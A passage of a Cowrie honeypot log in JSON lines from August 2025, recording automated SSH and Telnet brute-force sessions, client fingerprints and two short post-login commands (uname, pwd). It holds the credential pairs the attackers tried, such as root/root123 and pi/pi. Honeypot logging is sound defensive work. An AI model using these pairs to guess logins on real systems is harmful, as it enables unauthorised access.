dsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-26T22:12:00.413344Z","src_ip":"212.227.235.229","session":"70d1fcd0ed0a"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:12:00.609498Z","src_ip":"212.227.125.160","session":"15efc626174a"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:12:00.678302Z","src_ip":"212.227.235.229","session":"70d1fcd0ed0a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59708,"dst_ip":"1.2.3.4","dst_port":22,"session":"49ef5f6cf606","protocol":"ssh","message":"New connection: 212.227.125.160:59708 (1.2.3.4:22) [session: 49ef5f6cf606]","sensor":"my-vps","timestamp":"2025-08-26T22:12:04.571148Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:12:04.573129Z","src_ip":"212.227.125.160","session":"49ef5f6cf606"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:12:04.634467Z","src_ip":"212.227.125.160","session":"49ef5f6cf606"}
{"eventid":"cowrie.login.failed","username":"developer","password":"developer","message":"login attempt [developer/developer] failed","sensor":"my-vps","timestamp":"2025-08-26T22:12:04.817301Z","src_ip":"212.227.125.160","session":"49ef5f6cf606"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:12:06.129132Z","src_ip":"212.227.125.160","session":"49ef5f6cf606"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45569,"dst_ip":"1.2.3.4","dst_port":23,"session":"0c786cf55de0","protocol":"telnet","message":"New connection: 212.227.235.229:45569 (1.2.3.4:23) [session: 0c786cf55de0]","sensor":"my-vps","timestamp":"2025-08-26T22:12:06.872070Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55096,"dst_ip":"1.2.3.4","dst_port":22,"session":"abfad2e6773c","protocol":"ssh","message":"New connection: 212.227.125.160:55096 (1.2.3.4:22) [session: abfad2e6773c]","sensor":"my-vps","timestamp":"2025-08-26T22:12:10.183987Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:12:10.185802Z","src_ip":"212.227.125.160","session":"abfad2e6773c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:12:10.235070Z","src_ip":"212.227.125.160","session":"abfad2e6773c"}
{"eventid":"cowrie.login.success","username":"root","password":"root123","message":"login attempt [root/root123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T22:12:10.386509Z","src_ip":"212.227.125.160","session":"abfad2e6773c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T22:12:10.551301Z","src_ip":"212.227.125.160","session":"abfad2e6773c"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T22:12:10.552094Z","src_ip":"212.227.125.160","session":"abfad2e6773c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:12:10.602656Z","src_ip":"212.227.125.160","session":"abfad2e6773c"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:12:10.603913Z","src_ip":"212.227.125.160","session":"abfad2e6773c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50484,"dst_ip":"1.2.3.4","dst_port":22,"session":"6f65b13f9ad2","protocol":"ssh","message":"New connection: 212.227.125.160:50484 (1.2.3.4:22) [session: 6f65b13f9ad2]","sensor":"my-vps","timestamp":"2025-08-26T22:12:15.431208Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:12:15.432076Z","src_ip":"212.227.125.160","session":"6f65b13f9ad2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:12:15.517358Z","src_ip":"212.227.125.160","session":"6f65b13f9ad2"}
{"eventid":"cowrie.login.failed","username":"pi","password":"pi","message":"login attempt [pi/pi] failed","sensor":"my-vps","timestamp":"2025-08-26T22:12:16.013959Z","src_ip":"212.227.125.160","session":"6f65b13f9ad2"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:12:17.283566Z","src_ip":"212.227.125.160","session":"6f65b13f9ad2"}
{"eventid":"cowrie.session.closed","duration":13.026504516601562,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:12:19.898506Z","src_ip":"212.227.235.229","session":"0c786cf55de0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45872,"dst_ip":"1.2.3.4","dst_port":22,"session":"af39766fea37","protocol":"ssh","message":"New connection: 212.227.125.160:45872 (1.2.3.4:22) [session: af39766fea37]","sensor":"my-vps","timestamp":"2025-08-26T22:12:21.952738Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:12:21.953529Z","src_ip":"212.227.125.160","session":"af39766fea37"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:12:22.003642Z","src_ip":"212.227.125.160","session":"af39766fea37"}
{"eventid":"cowrie.login.failed","username":"jfletcher","password":"jfletcher","message":"login attempt [jfletcher/jfletcher] failed","sensor":"my-vps","timestamp":"2025-08-26T22:12:22.173214Z","src_ip":"212.227.125.160","session":"af39766fea37"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:12:23.383560Z","src_ip":"212.227.125.160","session":"af39766fea37"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41258,"dst_ip":"1.2.3.4","dst_port":22,"session":"8a5a3885c432","protocol":"ssh","message":"New connection: 212.227.125.160:41258 (1.2.3.4:22) [session: 8a5a3885c432]","sensor":"my-vps","timestamp":"2025-08-26T22:12:27.870560Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:12:27.871420Z","src_ip":"212.227.125.160","session":"8a5a3885c432"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:12:27.930233Z","src_ip":"212.227.125.160","session":"8a5a3885c432"}
{"eventid":"cowrie.login.failed","username":"sys","password":"sys","message":"login attempt [sys/sys] failed","sensor":"my-vps","timestamp":"2025-08-26T22:12:28.095090Z","src_ip":"212.227.125.160","session":"8a5a3885c432"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:12:29.155592Z","src_ip":"212.227.125.160","session":"8a5a3885c432"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36644,"dst_ip":"1.2.3.4","dst_port":22,"session":"af45a43c410c","protocol":"ssh","message":"New connection: 212.227.125.160:36644 (1.2.3.4:22) [session: af45a43c410c]","sensor":"my-vps","timestamp":"2025-08-26T22:12:33.769637Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:12:33.784346Z","src_ip":"212.227.125.160","session":"af45a43c410c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:12:33.819336Z","src_ip":"212.227.125.160","session":"af45a43c410c"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"mysql","message":"login attempt [mysql/mysql] failed","sensor":"my-vps","timestamp":"2025-08-26T22:12:34.016336Z","src_ip":"212.227.125.160","session":"af45a43c410c"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:12:35.114137Z","src_ip":"212.227.125.160","session":"af45a43c410c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46911,"dst_ip":"1.2.3.4","dst_port":22,"session":"673a08a7d2b0","protocol":"ssh","message":"New connection: 212.227.235.229:46911 (1.2.3.4:22) [session: 673a08a7d2b0]","sensor":"my-vps","timestamp":"2025-08-26T22:12:37.701369Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:12:37.702726Z","src_ip":"212.227.235.229","session":"673a08a7d2b0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:12:37.914139Z","src_ip":"212.227.235.229","session":"673a08a7d2b0"}
{"eventid":"cowrie.login.success","username":"root","password":"!Q2w#E","message":"login attempt [root/!Q2w#E] succeeded","sensor":"my-vps","timestamp":"2025-08-26T22:12:38.410463Z","src_ip":"212.227.235.229","session":"673a08a7d2b0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T22:12:38.756613Z","src_ip":"212.227.235.229","session":"673a08a7d2b0"}
{"eventid":"cowrie.command.input","input":"pwd","message":"CMD: pwd","sensor":"my-vps","timestamp":"2025-08-26T22:12:38.757340Z","src_ip":"212.227.235.229","session":"673a08a7d2b0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a1159e9df3670d549d04524532629f5477ceb7deec9b45e47e8c009506ecb2c8","size":6,"shasum":"a1159e9df3670d549d04524532629f5477ceb7deec9b45e47e8c009506ecb2c8","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/a1159e9df3670d549d04524532629f5477ceb7deec9b45e47e8c009506ecb2c8 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:12:38.921685Z","src_ip":"212.227.235.229","session":"673a08a7d2b0"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:12:38.922821Z","src_ip":"212.227.235.229","session":"673a08a7d2b0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60264,"dst_ip":"1.2.3.4","dst_port":22,"session":"7bb18a524279","protocol":"ssh","message":"New connection: 212.227.125.160:60264 (1.2.3.4:22) [session: 7bb18a524279]","sensor":"my-vps","timestamp":"2025-08-26T22:12:39.148659Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:12:39.152095Z","src_ip":"212.227.125.160","session":"7bb18a524279"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:12:39.202306Z","src_ip":"212.227.125.160","session":"7bb18a524279"}
{"eventid":"cowrie.login.failed","username":"libuuid","password":"libuuid","message":"login attempt [libuuid/libuuid] failed","sensor":"my-vps","timestamp":"2025-08-26T22:12:40.124939Z","src_ip":"212.227.125.160","session":"7bb18a524279"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:12:41.224535Z","src_ip":"212.227.125.160","session":"7bb18a524279"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55650,"dst_ip":"1.2.3.4","dst_port":22,"session":"f1261ba6cdc6","protocol":"ssh","message":"New connection: 212.227.125.160:55650 (1.2.3.4:22) [session: f1261ba6cdc6]","sensor":"my-vps","timestamp":"2025-08-26T22:12:45.107413Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:12:45.108388Z","src_ip":"212.227.125.160","session":"f1261ba6cdc6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","e